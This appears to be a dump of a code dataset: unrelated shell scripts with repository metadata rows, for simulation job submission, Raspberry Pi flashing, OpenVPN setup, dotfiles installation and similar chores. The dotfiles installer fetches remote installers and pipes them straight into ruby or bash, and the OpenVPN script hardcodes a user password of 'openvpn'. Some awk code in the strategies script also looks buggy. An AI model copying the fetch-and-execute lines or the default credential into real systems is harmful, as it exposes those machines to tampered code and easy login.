beam_size=(1 4 8 12 16 20)
replace=1
ref=../data/c2e.180W.gen/test/mt08/test.txt
refnum=4
# Translate the test set once per beam width. Iterate the array directly
# instead of the old seq/expr index dance (which also reused `k` as both
# the index and the value); the unused `len` variable is gone as well.
for k in "${beam_size[@]}"
do
    output=../data/c2e.180W.gen/test/mt08/c.utf8.token.trans.k$k
    echo "./translate.sh -m $model -t $input -o $output -r $replace -d $ref -n $refnum -k $k"
    ./translate.sh -m $model -t $input -o $output -r $replace -d $ref -n $refnum -k $k
done
| true |
24e0bb0a2d568a053d36cf70f3286af7af2a7bd2 | Shell | tlewis11/raspberrypi-hacking | /rpi_image_utils.sh | UTF-8 | 586 | 4.125 | 4 | [] | no_license | #!/bin/bash
# Download the latest Raspbian image from the official mirror; wget stores
# the file in the current working directory.
get_image(){
	wget 'https://downloads.raspberrypi.org/raspbian_latest'
}
# flash_image <imagefile> <diskpath>
# Interactively copy a disk image onto a block device with dd (via sudo).
# Prompts for confirmation and only proceeds when the user types exactly
# "yes"; any other answer is a no-op. Exits the shell with 1 on bad usage.
flash_image(){
	if [ "$#" -ne 2 ];
	then
		echo 'Usage: flash_image imagefile diskpath'
		exit 1
	fi
	local image_filename="$1"
	local disk_path="$2"
	local answer
	echo "Are you sure you want to flash the disk image $image_filename to the disk at $disk_path. only 'yes' will succeed"
	# -r keeps backslashes in the reply literal instead of acting as escapes
	read -r answer
	echo "answer: $answer"
	if [ "$answer" == "yes" ];
	then
		echo "copying $image_filename to $disk_path"
		# quote both operands so paths containing spaces reach dd intact
		sudo dd bs=1M if="$image_filename" of="$disk_path"
	fi
}
| true |
73540962567def1684cd6801592e21d423dd7c59 | Shell | gusha987/via-piudzpa-helper-files | /asteroids/prepare_dev_env.sh | UTF-8 | 2,329 | 3.375 | 3 | [] | no_license | #!/bin/bash
# Location (relative to $HOME) of the developer's private secret files.
sec_secret_storage_loc="/my_secret_files"

# check_status <failure message>
# Examines the exit status of the command executed immediately before this
# call: prints "OK" when it succeeded, otherwise prints the given message
# and aborts the whole script with status 1. Replaces the seven duplicated
# `if [ $? -eq 0 ]; then ... fi` one-liners of the original script.
check_status() {
    if [ $? -eq 0 ]; then echo "OK"; else echo "$1"; exit 1; fi
}

# Visual divider between setup steps.
separator() {
    echo "------------------------------------------------"
}

echo "Script for preparing the development environment"
separator
echo "Checking if config.ini exists in the current working dir -->"
if test -f "config.ini"; then
    echo "exists"
else
    echo "Copying config file from secure secret storage"
    cp "$HOME$sec_secret_storage_loc/config.ini" .
    check_status "Problem copying config.ini file"
fi
separator
echo "Checking if log_worker.yaml exists in the current working dir -->"
if test -f "log_worker.yaml"; then
    echo "exists"
else
    echo "Copying log config file from local dev template log_worker.yaml.dev"
    cp log_worker.yaml.dev log_worker.yaml
    check_status "Problem copying log_worker.yaml file"
fi
separator
echo "Checking if log_migrate_db.yaml exists in the current working dir -->"
if test -f "log_migrate_db.yaml"; then
    echo "exists"
else
    echo "Copying log config file from local dev template log_migrate_db.yaml.dev"
    cp log_migrate_db.yaml.dev log_migrate_db.yaml
    check_status "Problem copying log_migrate_db.yaml file"
fi
separator
echo "Getting python3 executable loc"
python_exec_loc=$(which python3)
check_status "Problem getting python3 exec location"
echo "$python_exec_loc"
separator
echo "Running config tests"
"$python_exec_loc" test_config.py
check_status "Configuration test FAILED"
separator
echo "Running DB migrations"
"$python_exec_loc" migrate_db.py
check_status "DB migration FAILED"
separator
echo "Running asteroid worker tests"
"$python_exec_loc" test_worker.py
check_status "Worker test FAILED"
separator
echo "ALL SET UP! YOU ARE READY TO CODE"
echo "to start the program, execute:"
echo "$python_exec_loc worker_2_db.py"
| true |
85cc0ff5937af2a26100189a315602ddd6db2534 | Shell | gesundes/nexus-test-new | /roles/openvpn-ami/files/install_openvpn.sh | UTF-8 | 1,279 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# Create the VPN login account used by the PAM auth plugin below.
# NOTE(review): this hardcodes password "openvpn" — change before real use.
useradd openvpn
echo "openvpn:openvpn" | chpasswd
# Enable IPv4 forwarding on the next sysctl reload/boot.
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
apt update && DEBIAN_FRONTEND=noninteractive apt install openvpn easy-rsa iptables-persistent -y
#Configure iptables
# NAT (masquerade) the 10.8.0.0/24 VPN subnet out of eth0; persisted by
# iptables-persistent from rules.v4.
cat > /etc/iptables/rules.v4 <<EOF
*nat
:PREROUTING ACCEPT [41:2519]
:INPUT ACCEPT [18:1004]
:OUTPUT ACCEPT [101:9220]
:POSTROUTING ACCEPT [101:9220]
-A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
COMMIT
EOF
# Configure OpenVPN
# Build a CA, server certificate and DH parameters with easy-rsa, then
# copy the generated keys into /etc/openvpn.
cp -r /usr/share/easy-rsa /etc/openvpn
cd /usr/share/easy-rsa
cp openssl-1.0.0.cnf openssl.cnf
source vars
./clean-all
./pkitool --initca
cp ./keys/ca.crt /home/ubuntu
chown ubuntu:ubuntu /home/ubuntu/ca.crt
./pkitool --server server
./build-dh
cp ./keys/* /etc/openvpn
# Server config: TCP/1194, username/password auth through PAM instead of
# client certificates (verify-client-cert none).
cat > /etc/openvpn/server.conf <<EOF
port 1194
proto tcp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
verify-client-cert none
plugin /usr/lib/x86_64-linux-gnu/openvpn/plugins/openvpn-plugin-auth-pam.so login
status openvpn-status.log
verb 3
push "route 10.0.0.0 255.255.0.0"
push "dhcp-option DNS 10.0.0.2"
EOF
sleep 10
systemctl daemon-reload
# NOTE(review): `systemctl start openvpn` is executed twice — the second
# invocation looks redundant; confirm and remove.
systemctl start openvpn
systemctl start openvpn
systemctl enable openvpn
| true |
0daaefa26aa1af0a0d13cf8609120b50889be20b | Shell | delkyd/alfheim_linux-PKGBUILDS | /teleprompter-git/PKGBUILD | UTF-8 | 883 | 2.71875 | 3 | [] | no_license | # Maintainer: Michael DeGuzis <mdeguzis@gmail.com>
# Arch Linux PKGBUILD metadata for the teleprompter VCS package.
pkgname=teleprompter-git
# pkgver is a placeholder; makepkg regenerates it via the pkgver() function.
pkgver=r122.36db364
pkgrel=1
pkgdesc="Professional-grade, multi-platform, free software teleprompter, installed through npm"
arch=('any')
url="www.imaginary.tech/teleprompter"
license=('GPLv3')
depends=('git' 'nodejs')
makedepends=('npm')
options=(!emptydirs)
# Build straight from the upstream git repository; no checksum for VCS sources.
source=('teleprompter-git::git+https://github.com/imaginaryfilms/Teleprompter-Core.git')
sha256sums=('SKIP')
# Derive the VCS package version from the checked-out repository:
# r<number of commits>.<short hash>, e.g. r122.36db364.
pkgver() {
  cd "$srcdir/$pkgname"
  local commits rev
  commits=$(git rev-list --count HEAD)
  rev=$(git rev-parse --short HEAD)
  printf "r%s.%s" "$commits" "$rev"
}
# Install the npm package into the staging directory $pkgdir and ship the
# license file; the two sed passes strip build-time absolute paths that npm
# records inside the generated package.json files.
package() {
  cd "$pkgname"
  mkdir -p $pkgdir/usr
  npm install --user root -g --prefix="$pkgdir/usr"
  install -D -m644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
  find "${pkgdir}" -name "package.json" -exec sed -e "s|${pkgdir}||" -i {} \;
  find "${pkgdir}" -name "package.json" -exec sed -e "s|${srcdir}||" -i {} \;
}
| true |
7cdb145028e9aedcf288ad2b8db698629e452b72 | Shell | busathlab/mdlab | /labs/lab8_perturbation/submit.sh | UTF-8 | 3,607 | 3.453125 | 3 | [] | no_license | #!/bin/bash
#################################
### FOR USE ONLY WITH TSM LAB ###
### MGLEED 29 May 2014	      ###
#################################
### Define these variables ###
#Is this a water simulation or a 2kqt simulation? (water/2kqt)
export type=2kqt
#Is this for a dynamics script or a post-processing script? (0 if dynamics, 1 if post-processing script)
export simtype=1
#Which values of lambda would you like to simulate? (If for post-processing, ensure match in lambda vars near script end)
export lambdas=( ".05" ".125" ".5" ".875" ".95" )
export numlambdas=5
#Drug ID's for TSM (mutate drug1 to drug2); e.g. use 035 for Amt and 150 for Rim
export drug1=035
export drug2=150
#For dynamics only...Is this a restart? (0 if heating, 1 or more for restart level)
export rst=1
#For post-processing only...What was the last restart number performed?
export lastrestart=1
#Random-number-generator seed (optional)
export iseed=21951
#######################################################
# Shouldn't need to change anything beyond this point #
#######################################################
submitscript=batch.submit
# Create submission scripts via here-document
# (the "EOF" delimiter is quoted, so nothing below is expanded here: the
# $variables are resolved later, on the compute node, from the environment
# exported above and by sbatch/SLURM)
cat <<"EOF" > $submitscript
#!/bin/bash
#SBATCH
cd "$SLURM_SUBMIT_DIR"
module purge
module load charmm
if [ $simtype == 0 ]; then
   export OMP_NUM_THREADS=$SLURM_CPUS_ON_NODE
   mpirun $(which charmm) drug1:$drug1 drug2:$drug2 iseed:$iseed rst:$rst L:${L} type:$type < $INFILE > $OUTFILE
else
   $(which charmm) numlambdas:$numlambdas drug1:$drug1 drug2:$drug2 lambda4:$lambda4 lambda5:$lambda5 lambda1:$lambda1 lambda2:$lambda2 lambda3:$lambda3 OUTFILE:$OUTFILE lastrestart:$lastrestart type:$type < $INFILE > $OUTFILE
fi
exit 0
EOF
chmod 770 $submitscript
# Dynamics mode: submit one sbatch job per lambda value.
if [ $simtype == 0 ]; then
   # heating jobs are short (1h); restarts get a long wall time (120h)
   if [ $rst == 0 ]; then
      export htrst=heat
      wallhours=1
   else
      export htrst=restart
      wallhours=120
   fi
   for submission in $(seq 0 $(($numlambdas - 1))); do
      export L=${lambdas[$submission]}
      export INFILE=tsm.${htrst}_${type}.str
      export OUTFILE=log/log.tsm_150_${type}_${rst}_${L}
      echo "Submitting ${type} lambda=${L} restart=${rst}"
      if [ $type == water ]; then
         sbatch -J "fe.${rst}.${L}.${type}" -e "log/slurm/fe.${rst}.${L}.${type}.e%j" -o "log/slurm/fe.${rst}.${L}.${type}.o%j" -N1 -n8 --mem-per-cpu=2G -t${wallhours}:00:00 ${submitscript}
      else
         ##BILAYER SIMULATION NEEDS LOTS OF RESOURCES...
         sbatch -J "fe.${rst}.${L}.${type}" -e "log/slurm/fe.${rst}.${L}.${type}.e%j" -o "log/slurm/fe.${rst}.${L}.${type}.o%j" -N1 -n12 --mem-per-cpu=2G -t${wallhours}:00:00 ${submitscript}
      fi
   done
# Post-processing mode: run the generated script locally (not via sbatch)
# and trim the CHARMM log down to the TSM data table.
else
   export lambda1=${lambdas[0]}
   export lambda2=${lambdas[1]}
   export lambda3=${lambdas[2]}
   export lambda4=${lambdas[3]}
   export lambda5=${lambdas[4]}
   export INFILE=tsm.post_processing.str
   export OUTFILE=log/log.tsm.post_processing.${type}.str
   #sbatch -J "pp.${type}" -e "log/slurm/pp.${type}.e%j" -o "log/slurm/pp.${type}.o%j" -N1 -n1 --mem-per-cpu=2G -t10:00:00 ${submitscript}
   ./${submitscript}
   #create output file
   echo "fixing output file"
   #find first line of interest
   # (first line containing "plot files" marks the start of the data)
   tail -n +`grep -n "plot files" ${OUTFILE} | sed -e "s/:/ /" | awk '{print $1}' | head -n 1` ${OUTFILE} > output/postp/${drug2}_${type}_tmp.txt
   #cut out lines not of interest
   # (keep up to the first "CHARMM" marker, then drop 2 trailing and
   # 3 leading framing lines)
   head -n `grep -n CHARMM output/postp/${drug2}_${type}_tmp.txt | sed -e "s/:/ /" | awk '{print $1}' | head -n 1` output/postp/${drug2}_${type}_tmp.txt | head -n -2 | tail -n +4 > output/postp/${drug2}_${type}.txt
   rm output/postp/${drug2}_${type}_tmp.txt
   echo "Done. Processed TSM data in output/postp/${drug2}_${type}.txt"
fi
rm $submitscript
| true |
c04f9d87334d3c0b126d86e94f89a6fc73499455 | Shell | danesjenovdan/parladata | /tagger/train.sh | UTF-8 | 1,014 | 2.625 | 3 | [] | no_license | #!/bin/bash
# prepare marisa for tagger training
echo "Preparing marisa for tagger training."
# feed columns 1-3 of the lexicon straight into the converter
# (cut reads the file itself; the former `cat file |` was redundant)
cut -f 1,2,3 sloleks_clarin_2.0-en.ud.tbl | python prepare_marisa.py sl.marisa
echo "Generated the following files: sl.lemma_freq, sl.marisa"
# train the tagger
echo "Training the tagger, this will take 6-ish hours."
python train_tagger.py sl
echo "Generated the following files: sl.msd.model"
# prepare the lexicon for the lemmatizer
echo "Preparing the lexicon for the lemmatizer."
python lemma_freq.py sl.lemma_freq < sl.train
echo "Created the following files: sl.lemma_freq"
# transform the lexicon into a marisa_trie.BytesTrie
echo "Transforming the lexicon into a marise_trie.BytesTrie."
cut -f 1,2,3 sloleks_clarin_2.0-en.ud.tbl | python prepare_lexicon.py sl.lemma_freq sl.lexicon
echo "Created the following files: sl.lexicon, sl.lexicon.train"
# train the lemma guesser
echo "Training lemmatiser."
python train_lemmatiser.py sl.lexicon
echo "Created the following files: sl.lexicon.guesser"
| true |
442664e77aed0483bd562da5def308bfdcf114f1 | Shell | hallyn/sxmo-scripts | /telegram-new | UTF-8 | 724 | 3.5 | 4 | [] | no_license | #!/bin/bash
# This is intended as a rtcwake hook. It checks for new telegram messages
# and will do a ring if found. Exits 1 when there were new messages so the
# caller can react; the mtime/ctime of ~/tg-new records the last check.
ACCOUNTS="mail Notify"
new=0
lastcheck=$(stat -c "%Z" ~/tg-new)
for A in $ACCOUNTS; do
	# Keep the `while` loop in the current shell by reading from a process
	# substitution. The original piped into `while`, which ran the loop in
	# a subshell, so every `new=$((new + 1))` was silently discarded and
	# the notification below could never fire.
	while read -r line; do
		msgtime=$(date -d "$line" +%s)
		if [ "$msgtime" -ge "$lastcheck" ]; then
			new=$((new + 1))
		fi
	done < <(telegram-cli -W -e "history $A" | awk '/^ [0-9][0-9]:[0-9][0-9]/ { print $1 }' | tr -d '[]')
done
echo "$new" > ~/tg-new
if [ "$new" -gt 0 ]; then
	notify-send "$new new messages"
	if [ -x "$XDG_CONFIG_HOME/sxmo/hooks/ring" ]; then
		"$XDG_CONFIG_HOME/sxmo/hooks/ring"
	fi
	exit 1
fi
| true |
c60d0702798e7e1b4b42d4ad06e4a1ed7cebcce2 | Shell | nicktimko/talks-throw-out-your-shell-scripts | /examples/sh-snippets/if.sh | UTF-8 | 90 | 2.828125 | 3 | [] | no_license | #!/bin/sh
# Default the first argument to 0 so the numeric test below cannot fail
# with "unary operator expected" when the script runs without arguments
# (the original unquoted `[ $argument -ne 0 ]` errored in that case).
argument=${1:-0}
if [ "$argument" -ne 0 ]
then
echo "yerp"
else
echo "nope"
fi
| true |
ba5a5697943db3321d2af7094f6442b945eeea3e | Shell | floppyzedolfin/adventofcode | /scripts/create_day.sh | UTF-8 | 570 | 3.71875 | 4 | [
"Unlicense"
] | permissive | #! /usr/bin/env bash
# This script should be called from the root of the repo.
if [ ! -f ./Makefile ]; then
exit 1
fi
if [ $# -ne 1 ]; then
echo "missing parameter day"
exit 1
fi
# cast to int
day=$(($1))
# print to the right format
day=$(printf "%02d" ${day})
mkdir 2020/dec${day}
cp -r 2020/decXX/* 2020/dec${day}/.
mv 2020/dec${day}/decXX.go 2020/dec${day}/dec${day}.go
mv 2020/dec${day}/decXX_test.go 2020/dec${day}/dec${day}_test.go
sed -i -e "s/XX/${day}/g" 2020/dec${day}/dec${day}.go
sed -i -e "s/XX/${day}/g" 2020/dec${day}/dec${day}_test.go
| true |
92fe6f77717973374f8a745f8c33432b643d08a4 | Shell | AlexiaChen/Adrasteia | /operating-system/linux/shell/bash/cpu_util.sh | UTF-8 | 1,016 | 3.25 | 3 | [] | no_license | #/bin/bash
# usage: run this command, nohup pcmant.sh &
# author: MathxH
# email: brainfvck@foxmail.com
# Sample overall CPU utilisation over a 5 second window.
# Reads the first (aggregate "cpu") line of /proc/stat twice, 5 seconds
# apart, and computes active/total deltas between the two samples.
# Blocks for 5 seconds. The percentage (0-100) is returned via the exit
# status — an unusual channel, but safe here since the value fits in 0-255;
# the caller picks it up with $?.
get_cpu_usage()
{
    read cpu user nice system idle iowait irq softirq steal guest< /proc/stat
    # compute active and total utilizations
    cpu_active_prev=$((user+system+nice+softirq+steal))
    cpu_total_prev=$((user+system+nice+softirq+steal+idle+iowait))
    sleep 5
    # Read /proc/stat file (for second datapoint)
    read cpu user nice system idle iowait irq softirq steal guest< /proc/stat
    # compute active and total utilizations
    cpu_active_cur=$((user+system+nice+softirq+steal))
    cpu_total_cur=$((user+system+nice+softirq+steal+idle+iowait))
    # compute CPU utilization (%)
    # (integer arithmetic; NOTE(review): divides by the total delta, which
    # is assumed non-zero over a 5s window — confirm for your kernel/HZ)
    cpu_util=$((100*( cpu_active_cur-cpu_active_prev ) / (cpu_total_cur-cpu_total_prev) ))
    return $cpu_util
}
# Watchdog loop: sample CPU usage forever (each call blocks ~5s) and
# restart Tomcat whenever utilisation reaches 95% or more.
while [ 1 ]
do
    get_cpu_usage
    # utilisation percentage is delivered through the exit status
    RESULT=$?
    if [ $RESULT -ge 95 ]
    then
        echo "$RESULT >= 95 restarting server..."
        # kill any java/tomcat process by name, then start fresh
        pkill -f java
        pkill -f tomcat
        bash /root/tomcat7/bin/startup.sh
        echo "restarting server finished"
    fi
done
| true |
cd25d33fe7bc52c98e6fc50958fe5d0a2fc3d41e | Shell | sfabrizio/dotfiles | /install.sh | UTF-8 | 2,424 | 3.390625 | 3 | [] | no_license | if ! command -v git >/dev/null 2>&1; then
echo "git is required. Please install it first."
exit 1;
fi
cd ~
# fetch the dotfiles repo that provides the configs and helper scripts below
git clone git://github.com/sfabrizio/dotfiles.git dotfiles
# detect the OS via the helper just cloned; sets up get_os_name
source ~/dotfiles/scripts/get_os_name.sh
OS_NAME=`get_os_name`
# Check whether a Node.js interpreter is available on the PATH.
# Returns 0 (success) when `node` is found, non-zero otherwise — the
# command's own status is the function's status, so the old
# if/return 0/return 1 scaffolding is unnecessary.
function isNodeJs {
  command -v node >/dev/null 2>&1
}
#OSX install require packages
# macOS bootstrap: install Homebrew if missing, then the tools used below.
if [[ "$OS_NAME" == 'osx' ]]; then
  if ! command -v brew >/dev/null 2>&1; then
    # official Homebrew installer
    /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
  fi
  if ! command -v byobu >/dev/null 2>&1; then
    echo "installing byobu:"
    brew install byobu
  fi
  if ! isNodeJs ; then
    echo "installing node js:"
    brew install node
  fi
  brew install neovim git-extras
fi
# install package for any OS
npm_packages=('turbo-git' 'diff-so-fancy')
# install the npm helpers when node is present, otherwise just print the
# command the user should run after installing node
if ! isNodeJs ; then
  echo "install node js adn them install the require packages by running:"
  echo "'npm i -g ${npm_packages[@]}'"
else
  npm install -g ${npm_packages[@]}
fi
# install oh-my-zsh and make zsh the login shell
bash -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
chsh -s `which zsh`
# Install nvm into ~/.nvm on first run. The installer only edits shell rc
# files — it does not load nvm into the running shell.
if ! [ -d ~/.nvm ]; then
  curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.4/install.sh | bash
fi
# `nvm` is a shell function, not a binary: source it into THIS shell,
# otherwise every `nvm install` below fails with "nvm: command not found".
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh"
echo "Intaling nodeJS version on NVM"
nvm install 7
nvm install 8
nvm install 10
echo "Creating backup of your previus config files."
cp ~/.gitconfig ~/.gitconfig.bak > /dev/null
cp ~/.vimrc ~/.vimrc.bak > /dev/null
cp ~/.zshrc ~/.zshrc.bak > /dev/null
cp ~/.tmux.conf ~/.tmux.conf.bak > /dev/null
#creating folders
cd ~/
mkdir -p dotfiles
mkdir -p workspace
mkdir -p .tmux
mkdir -p .autoenv
mkdir -p .config/nvim
#creating symbolic links
ln -s env .env
echo "cloning git repos..."
cd ~
git clone git://github.com/kennethreitz/autoenv.git .autoenv
cd ~/workspace
git clone https://github.com/sfabrizio/ozono-zsh-theme
cd ~/.tmux
git clone https://github.com/erikw/tmux-powerline.git
echo "Coping new configuration files.."
echo "[include] path = ~/dotfiles/gitconfig" > ~/.gitconfig
echo "source ~/dotfiles/vimrc" > ~/.vimrc
echo "source ~/.vimrc" > ~/.config/nvim/init.vim
echo "source ~/dotfiles/zshrc" > ~/.zshrc
echo "source ~/dotfiles/tmux.conf" > ~/.tmux.conf
echo "source ~/dotfiles/tmux-powerlinerc" > ~/.tmux-powerlinerc
source ~/.zshrc
echo "Everything Done."
| true |
cd1b7cb6307c880fe56858ec31a8718382dd2002 | Shell | asai-obsolete-code/torque-utils | /setup/cfn-sshconfig | UTF-8 | 716 | 3.53125 | 4 | [] | no_license | #!/bin/bash
# cfn-sshconfig: (re)generate the ~/.ssh/config entry for a CloudFormation
# host.  Polls cfn-hostname until the instance's public DNS is available,
# then rewrites the "# BEGIN/END <name>-cfn" managed section.
# Arguments: $1 - stack/host name (falls back to $name from ./common)
# Globals:   name, user - provided by the sourced ./common
# All parameter expansions are now quoted so paths/names containing
# whitespace cannot word-split or glob.
dir=$(dirname "$(readlink -ef "$0")")
. "$dir/common"
config="$HOME/.ssh/config"
name=${1:-$name}
# Remove the temp file on any exit; abort outright on signals.
trap 'rm -vf "$config.tmp"' EXIT
trap "exit 1" INT TERM HUP
# Poll until cfn-hostname succeeds AND returns a non-empty DNS name
# (checking the assignment directly replaces the fragile `[ $? == 0 ]`).
while :
do
    if host=$("$dir/cfn-hostname" "$name") && [ -n "$host" ]; then
        break
    fi
    echo "Failed to find the public DNS" >&2
    sleep 5
done
echo "DNS found: $host" >&2
# Rebuild the config: drop the old managed section, append a fresh one,
# then copy the result back over the original file.
(
    sed "/^# BEGIN $name-cfn/,/^# END $name-cfn/d" < "$config"
    cat <<EOF
# BEGIN $name-cfn
Host $name
    HostName $host
    User $user
    IdentityFile ~/Dropbox/private/publickeys/wasabi.enc
# END $name-cfn
EOF
) > "$config.tmp"
cat "$config.tmp" > "$config"
| true |
d4223efb5bab711a117a848c10a9b34b20ada757 | Shell | dhungvi/publiy | /publiy/misc/bash_bin/extract_strategies_delivery_pathlength_timing_summary_awk | UTF-8 | 5,018 | 2.9375 | 3 | [] | no_license | #!/bin/bash
# Validate the three experiment directories (env vars dir1..dir3, one per
# strategy) and parse run parameters out of their names.
# `red` is an external helper — presumably prints its message in red;
# confirm it is provided by the caller's environment.
if [ ! -d "$dir1" ]; then
	red "Dir1 $dir1 is not set";
	exit -1; fi
if [ ! -d "$dir2" ]; then
	red "Dir2 $dir2 is not set";
	exit -1; fi
if [ ! -d "$dir3" ]; then
	red "Dir3 $dir3 is not set";
	exit -1; fi
workingdir=`pwd`;
# Execution id: the digits following "__" in each directory name.
exec1="`echo $dir1 | awk '{printf gensub(/.*__([[:digit:]]*).*/,"\\\\1",1);}'`"
exec2="`echo $dir2 | awk '{printf gensub(/.*__([[:digit:]]*).*/,"\\\\1",1);}'`"
exec3="`echo $dir3 | awk '{printf gensub(/.*__([[:digit:]]*).*/,"\\\\1",1);}'`"
# Fan-out (FOUT<digits>) — must agree across all three runs.
fanout1="`echo $dir1 | awk '{printf gensub(/.*FOUT([[:digit:]]*).*/,"\\\\1",1);}'`"
fanout2="`echo $dir2 | awk '{printf gensub(/.*FOUT([[:digit:]]*).*/,"\\\\1",1);}'`"
fanout3="`echo $dir3 | awk '{printf gensub(/.*FOUT([[:digit:]]*).*/,"\\\\1",1);}'`"
if [ "$fanout1" != "$fanout2" -o "$fanout2" != "$fanout3" ]; then
	red "Fanout values mismatch: $fanout1, $fanout2, $fanout3";
	exit -1; fi
# Multiplier (MULT<digits>) — must agree across all three runs.
mult1="`echo $dir1 | awk '{printf gensub(/.*MULT([[:digit:]]*).*/,"\\\\1",1);}'`"
mult2="`echo $dir2 | awk '{printf gensub(/.*MULT([[:digit:]]*).*/,"\\\\1",1);}'`"
mult3="`echo $dir3 | awk '{printf gensub(/.*MULT([[:digit:]]*).*/,"\\\\1",1);}'`"
# BUG FIX: this guard previously compared $delta1/$delta2/$delta3, which
# are only parsed further below (so they were empty here and a MULT
# mismatch could never be detected).  Compare the mult values instead.
if [ "$mult1" != "$mult2" -o "$mult2" != "$mult3" ]; then
	red "Mult values mismatch: $mult1, $mult2, $mult3";
	exit -1; fi
inbw1="`echo $dir1 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
inbw2="`echo $dir2 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
inbw3="`echo $dir3 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
if [ "$inbw1" != "$inbw2" -o "$inbw2" != "$inbw3" ]; then
red "Inbw values mismatch: $inbw1, $inbw2, $inbw3";
exit -1; fi
outbw1="`echo $dir1 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\2",1);}'`"
outbw2="`echo $dir2 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\2",1);}'`"
outbw3="`echo $dir3 | awk '{printf gensub(/.*INOUT_BYTES{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\2",1);}'`"
if [ "$outbw1" != "$outbw2" -o "$outbw2" != "$outbw3" ]; then
red "Outbw values mismatch: $outbw1, $outbw2, $outbw3";
exit -1; fi
delta1="`echo $dir1 | awk '{printf gensub(/.*-d([[:digit:]]*)-.*/,"\\\\1",1);}'`"
delta2="`echo $dir2 | awk '{printf gensub(/.*-d([[:digit:]]*)-.*/,"\\\\1",1);}'`"
delta3="`echo $dir3 | awk '{printf gensub(/.*-d([[:digit:]]*)-.*/,"\\\\1",1);}'`"
if [ "$delta1" != "$delta2" -o "$delta2" != "$delta3" ]; then
red "Delta values mismatch: $delta1, $delta2, $delta3";
exit -1; fi
str1="`echo $dir1 | awk '{printf gensub(/.*STR([[:digit:]]*).*/,"\\\\1",1);}'`"
str2="`echo $dir2 | awk '{printf gensub(/.*STR([[:digit:]]*).*/,"\\\\1",1);}'`"
str3="`echo $dir3 | awk '{printf gensub(/.*STR([[:digit:]]*).*/,"\\\\1",1);}'`"
if [ "$str1" != "1" ]; then
red "$dir1 is not a strategy 1 directory";
exit -1;
elif [ "$str2" != "2" ]; then
red "$dir2 is not a strategy 2 directory";
exit -1;
elif [ "$str3" != "3" ]; then
red "$dir3 is not a strategy 3 directory";
exit -1;
fi
pdelay1="`echo $dir1 | awk '{printf gensub(/.*DELAY{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
pdelay2="`echo $dir2 | awk '{printf gensub(/.*DELAY{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
pdelay3="`echo $dir3 | awk '{printf gensub(/.*DELAY{([[:digit:]]*)-([[:digit:]]*)}.*/,"\\\\1",1);}'`"
p2p_all=`awk '{printf $1" "}' $dir1/plots/delivery_pathlength_timings_grouped`;
summaryfilename="strategies_delivery_pathlength_timing_summary_mult"$mult1","$mult2","$mult3"_pdelay"$pdelay1","$pdelay2","$pdelay3"_delta"$delta1,$delta2,$delta3"_str"$str1","$str2","$str3"_fanout"$fanout1","$fanout2","$fanout3"_bw"$inbw1"_exec"$exec1","$exec2","$exec3;
i=0;
if [ -f "$summaryfilename" ]; then
red "SKIPPING creation of summary file $summaryfilename";
else
green "Starting awking!"
awk "BEGIN{while(1==1){if(0>getline(\"$dir1/plots/delivery_pathlength_timings_summary\"))break; str1[\"\$1\"]=\"\$0\";} while(1==1){if(0>getline(\"$dir2/plots/delivery_pathlength_timings_summary\")) break; str2[\"\$1\"]=\"\$0\";} while(1==1){if(0>getline(\"$dir3/plots/delivery_pathlength_timings_summary\"))break; str3[\"\$1\"]=\"\$0\";} l=asorti(str1,dest1); for(i=1;i<=l;i++){print str1[dest[l]]; print str2[dest[l]]; print str3[dest[l]]; print \"\"; }}" > $summaryfilename;
fi
for str in 1 2 3; do
strXsummaryfile="strategies_delivery_pathlength_timing_summary_mult"$mult1","$mult2","$mult3"_pdelay"$pdelay1","$pdelay2","$pdelay3"_delta"$delta1,$delta2,$delta3"_str"$str"_fanout"$fanout1","$fanout2","$fanout3"_bw"$inbw1"_exec"$exec1","$exec2","$exec3;
awk "{if(\$2==$str)print}" $summaryfilename > $strXsummaryfile;
green -e "Strategy $str\n`awk '{tot_delay+=$4; tot_path_len+=$5; tot_msg+=$6;}END{print "Total msg:\\t"tot_msg"\\nTotal pathlen:\\t"tot_path_len"\\nTotal delay:\t"tot_delay"\\nAvg Pathlen:\\t"(tot_path_len/tot_msg)"\\nAvg delay:\\t"(tot_delay/tot_msg); }' $strXsummaryfile`";
done
| true |
86bca1f3c86c8c0a8ce79ac906715c6abfb280a2 | Shell | ultimateboy/service-catalog | /contrib/jenkins/cluster_utilities.sh | UTF-8 | 1,816 | 3.4375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Fail fast: unset variables and failing commands are fatal.
set -o nounset
set -o errexit
# Repository root (two levels above this script's directory).
ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
# Shared helpers (wait_for_expected_output, etc.).
